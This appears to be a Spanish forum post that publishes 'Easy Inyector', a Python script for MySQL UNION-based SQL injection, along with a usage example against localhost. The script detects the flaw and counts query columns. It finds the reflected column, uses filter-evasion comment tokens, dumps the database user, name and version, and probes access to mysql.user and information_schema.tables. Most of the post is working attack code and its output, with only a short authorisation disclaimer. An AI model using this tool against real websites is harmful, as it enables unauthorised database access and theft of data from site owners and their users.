En la siguiente versión le agregaré otras cosas y podrá escanear varios objetivos listados en un archivo de texto.
Esta herramienta busca (úsala solo contra sistemas que tengas autorización para probar):
* Vulnerabilidad (obvio)
* Número de columnas de la consulta ("column length")
* Información sobre la base de datos (usuario, nombre de la base y versión de MySQL)
* Busca automáticamente la columna que se refleja en la página y sirve para mostrar la información
* Verifica si la consulta inyectada puede leer mysql.user e information_schema.tables
Código
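#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Easy Inyector (C) Doddy Hackman 2010.

Checks a single URL for a MySQL UNION-based SQL injection: it looks for the
"different number of columns" error, counts the columns of the injected
query, finds the column that is reflected in the page and reads user(),
database() and version() through it.  It then reports whether the injected
query can read mysql.user and information_schema.tables.

Usage: sqli.py <url-ending-in-the-injectable-parameter>
(e.g. ``http://127.0.0.1/sql.php?id=``).

Detection is error-based: a target that does not echo the MySQL error into
the page is reported as "Not Vulnerable" even if the parameter is injectable.

The tool sends attack payloads to the target.  Run it only against systems
you are explicitly authorised to test.

Exit status: 0 when a vulnerability was found and the data dump completed;
1 for usage errors, "Not Vulnerable" and network/parsing failures.
"""
from __future__ import print_function

import os
import re
import sys

try:  # Python 2
    from urllib2 import urlopen
except ImportError:  # Python 3
    from urllib.request import urlopen

# Markers wrapped around the extracted data.  They are sent as hex literals
# so the injected string needs no quotes.
START_MARK = "3MP3Z4R"
START_HEX = "0x334d50335a3452"
SEP_MARK = "K0BRA"
SEP_HEX = "0x4b30425241"
PROBE = "hackman"        # placeholder in the reflected column, swapped for the payload
MAX_COLUMNS = 29         # highest column count the scan tries
REQUEST_TIMEOUT = 15     # seconds; the original request could hang forever

_DATA_RE = re.compile(START_MARK + "(.*?)" + START_MARK)
_COLUMN_RE = re.compile(SEP_MARK + "(.*?)" + SEP_MARK)
_COLUMN_COUNT_ERROR = re.compile(
    "The used SELECT statements have a different number of columns", re.I)

# (space token, trailing comment) for each filter-evasion mode.
_BYPASS_MODES = {
    "--": ("+", "--"),
    "/*": ("/**/", "/*"),
}


def clean():
    """Clear the terminal.  Not used by the scan flow; kept for compatibility."""
    os.system("cls" if sys.platform == "win32" else "clear")


def header():
    """Print the banner."""
    print("\n--== Easy Inyector ==--\n")


def show_credits():
    """Print the credits line."""
    print("\n\n(C) Doddy Hackman 2010\n")


def copyright():
    """Print the credits and abort with exit status 1 (failure path)."""
    show_credits()
    sys.exit(1)


def show():
    """Print the command-line usage."""
    print("\n[*] Sintax : ", sys.argv[0], " <web>\n")


def toma(web):
    """GET *web* and return the response body as text.

    A timeout keeps an unresponsive target from hanging the scan; bytes
    (Python 3) are decoded so the regex helpers work on both versions.
    """
    response = urlopen(web, timeout=REQUEST_TIMEOUT)
    try:
        body = response.read()
    finally:
        response.close()
    if not isinstance(body, str):
        body = body.decode("utf-8", "replace")
    return body


def bypass(bypass):
    """Return ``(space, comment)`` tokens for the evasion mode *bypass*.

    Unknown modes fall back to the ``--`` variant, as in the original.
    """
    return _BYPASS_MODES.get(bypass, _BYPASS_MODES["--"])


def build_url(web, pass1, pass2, select_list):
    """Append ``-1 UNION SELECT <select_list>`` plus the comment to *web*."""
    return web + "-1" + pass1 + "union" + pass1 + "select" + pass1 + select_list + pass2


def column_markers(count):
    """Select list of *count* marker-wrapped column numbers, 1..count."""
    return ",".join("concat(%s,%d,%s)" % (SEP_HEX, i, SEP_HEX)
                    for i in range(1, count + 1))


def probe_columns(count, reflected):
    """Select list ``1,2,...,count`` with column *reflected* replaced by PROBE.

    The original did ``re.sub(reflected, "hackman", "1,2,...")`` on the joined
    string, so a reflected column of ``"1"`` also clobbered ``"10"``, ``"11"``
    and so on (and treated the page value as a regex).  Whole column numbers
    are compared instead.
    """
    return ",".join(PROBE if str(i) == reflected else str(i)
                    for i in range(1, count + 1))


def more(web, passx):
    """Read user(), database() and version() through the reflected column.

    *web* is the UNION URL with PROBE in the reflected column position.  Also
    reports whether the injected query can be run ``FROM mysql.user`` and
    ``FROM information_schema.tables`` (a SEP_MARK in the reply means the
    query executed).
    """
    pass1, pass2 = bypass(passx)
    print("\n[+] Searching more data\n")
    payload = "concat(%s,%s,user(),%s,database(),%s,version(),%s,%s)" % (
        START_HEX, SEP_HEX, SEP_HEX, SEP_HEX, SEP_HEX, START_HEX)
    web1 = web.replace(PROBE, payload)
    found = _DATA_RE.findall(toma(web1))
    if found:
        # "K0BRA<user>K0BRA<db>K0BRA<version>K0BRA" -> ['', user, db, version, '']
        fields = found[0].split(SEP_MARK)
        if len(fields) >= 4:
            print("[+] Username :", fields[1])
            print("[+] Database :", fields[2])
            print("[+] Version :", fields[3], "\n")
        else:
            print("[-] Unexpected reply :", found[0])
    if SEP_MARK in toma(web1 + pass1 + "from" + pass1 + "mysql.user" + pass2):
        print("[+] mysql.user : on")
    if SEP_MARK in toma(web1 + pass1 + "from" + pass1 + "information_schema.tables" + pass2):
        print("[+] information_schema.tables : on")


def findlength(web, passx):
    """Find the column count of the injected query and dump data through it.

    Tries 2..MAX_COLUMNS columns; the first count whose reply carries a
    SEP_MARK is the right one, and the first marked value found is the column
    the page reflects.  Returns True once the data dump ran, False when no
    column count matched.
    """
    pass1, pass2 = bypass(passx)
    print("\n[+] Finding columns length")
    for count in range(2, MAX_COLUMNS + 1):
        page = toma(build_url(web, pass1, pass2, column_markers(count)))
        numbers = _COLUMN_RE.findall(page)
        if not numbers:
            continue
        print("[+] Column length :", count)
        print("[+] Numbers", numbers, "print data")
        select_list = probe_columns(count, numbers[0])
        if PROBE not in select_list:
            # The page echoed something that is not one of our column numbers;
            # the dump below will then find no marker.
            print("[-] Reflected value", numbers[0], "is not one of the injected columns")
        more(build_url(web, pass1, pass2, select_list), passx)
        print("\n[+] Scan Finished\n")
        return True
    print("[-] Length dont found\n")
    return False


def scan(web, passx):
    """Test *web* for UNION-based injection; returns True when data was dumped.

    ``UNION SELECT 1`` against a query with another column count makes MySQL
    raise "different number of columns"; seeing that text in the page shows
    the parameter reaches a query.  findlength() then searches the count.
    """
    pass1, pass2 = bypass(passx)
    print("\n[+] Testing vulnerability")
    page = toma(build_url(web, pass1, pass2, "1"))
    if _COLUMN_COUNT_ERROR.search(page):
        print("[+] SQLI Detected")
        return findlength(web, passx)
    print("[-] Not Vulnerable")
    return False


def main(argv=None):
    """Command-line entry point; returns the process exit status.

    The original bare ``except:`` swallowed every error (including the
    SystemExit raised on success) and printed the credits twice on the
    "Not Vulnerable" path; errors are now reported before exiting.
    """
    argv = sys.argv if argv is None else argv
    header()
    if len(argv) != 2:
        show()
        return 1
    completed = False
    try:
        completed = scan(argv[1], "--")
    except KeyboardInterrupt:
        print("\n[-] Interrupted")
        copyright()
    except Exception as exc:
        print("\n[-] Error :", exc)
        copyright()
    show_credits()
    return 0 if completed else 1


if __name__ == "__main__":
    sys.exit(main())
# The End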
Ejemplo de uso
Código:
C:/Users/DoddyH/Desktop/Arsenal X parte 2>sqli.py http://127.0.0.1/sql.php?id=
--== Easy Inyector ==--
[+] Testing vulnerability
[+] SQLI Detected
[+] Finding columns length
[+] Column length : 3
[+] Numbers ['1', '2', '3'] print data
[+] Searching more data
[+] Username : root@localhost
[+] Database : hackman
[+] Version : 5.1.41
[+] mysql.user : on
[+] information_schema.tables : on
[+] Scan Finished
(C) Doddy Hackman 2010